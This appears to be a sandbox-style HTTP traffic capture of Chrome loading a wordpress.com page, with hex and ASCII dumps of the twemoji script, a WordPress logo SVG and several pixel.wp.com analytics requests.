                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC864INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e 20 63 7c 7c 6d 2e 74 65 73 74 28 63 2e 6e
                                                                                                                                                                                                                                                Data Ascii: &(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in c||m.test(c.n
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c
                                                                                                                                                                                                                                                Data Ascii: \u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64
                                                                                                                                                                                                                                                Data Ascii: udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u2764\ufe0f\u200d
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75
                                                                                                                                                                                                                                                Data Ascii: \ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\u
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66
                                                                                                                                                                                                                                                Data Ascii: fff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\udffb-\udfff
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64
                                                                                                                                                                                                                                                Data Ascii: d83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\ud
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64
                                                                                                                                                                                                                                                Data Ascii: dd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\udc69\u200d\ud
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 29 7c 5b 23 2a 30 2d
                                                                                                                                                                                                                                                Data Ascii: \ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200d\u2b1b)|[#*0-
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC1369INData Raw: 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36 36 2d 5c 75 64 63 36 39 5c 75 64 63 36 65
                                                                                                                                                                                                                                                Data Ascii: 03d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc66-\udc69\udc6e


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.1149786192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC392OUTGET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:38 GMT
                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                Content-Length: 1237
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 19 May 2023 01:47:37 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "6466d539-4d5"
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Expires: Wed, 23 Apr 2025 15:54:01 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC875INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 31 32 20 38 31 32 2e 30 32 22 20 66 69 6c 6c 3d 22 23 31 30 31 35 31 37 22 3e 3c 74 69 74 6c 65 3e 77 6f 72 64 70 72 65 73 73 64 6f 74 63 6f 6d 2d 6d 61 72 6b 2d 62 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 32 22 3e 3c 67 20 69 64 3d 22 42 6c 61 63 6b 5f 57 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 42 6c 61 63 6b 20 57 22 3e 3c 70 61 74 68 20 64 3d 22 4d 34 30 36 2c 30 43 31 38 32 2e 31 33 2c 30 2c 30 2c 31 38 32 2e 31 33 2c 30 2c 34 30 36 53 31 38 32 2e 31 33 2c 38 31 32 2c 34 30 36 2c 38 31 32 2c 38 31 32
                                                                                                                                                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC362INData Raw: 33 36 33 2e 36 31 2c 33 36 33 2e 36 31 2c 30 2c 30 2c 31 2c 32 34 36 2e 34 39 2c 39 35 2e 38 34 63 2d 31 2e 35 36 2d 2e 31 31 2d 33 2e 31 2d 2e 33 2d 34 2e 37 32 2d 2e 33 2d 33 35 2e 38 36 2c 30 2d 36 31 2e 33 2c 33 31 2e 32 33 2d 36 31 2e 33 2c 36 34 2e 37 39 2c 30 2c 33 30 2e 30 38 2c 31 37 2e 33 35 2c 35 35 2e 35 32 2c 33 35 2e 38 36 2c 38 35 2e 36 31 2c 31 33 2e 38 37 2c 32 34 2e 33 31 2c 33 30 2e 30 39 2c 35 35 2e 35 34 2c 33 30 2e 30 39 2c 31 30 30 2e 36 36 71 30 2c 34 36 2e 38 39 2d 32 37 2e 37 38 2c 31 31 38 4c 35 38 38 2e 32 32 2c 36 32 37 2e 32 34 5a 4d 35 38 39 2e 35 32 2c 37 32 31 2e 35 2c 37 30 31 2c 33 39 39 2e 31 35 63 32 30 2e 38 34 2d 35 32 2e 30 38 2c 32 37 2e 37 37 2d 39 33 2e 37 32 2c 32 37 2e 37 37 2d 31 33 30 2e 37 34 61 32 37 39 2e
                                                                                                                                                                                                                                                Data Ascii: 363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87,24.31,30.09,55.54,30.09,100.66q0,46.89-27.78,118L588.22,627.24ZM589.52,721.5,701,399.15c20.84-52.08,27.77-93.72,27.77-130.74a279.


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.1149787192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC414OUTGET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:39 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:39 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:39 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.1149788192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC491OUTGET /g.gif?blog=240074490&v=wpcom&tz=-8&user_id=0&post=22&subd=dnearymedahealthstaffing&host=dnearymedahealthstaffing.wordpress.com&ref=&rand=0.5972709169619024 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:39 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:39 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:39 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.1149793192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC706OUTGET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.1149794192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC705OUTGET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=PfqOZc4jPU0a%2FtwKEstg1J5h&_ut=anon&_ts=1734709534238&_tz=5&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedahealthstaffing-proposal%2F&_dr=&blog_id=240074490&blog_tz=-8&user_lang=en&blog_lang=en&user_id=0&_rt=1734709534355&_=_ HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
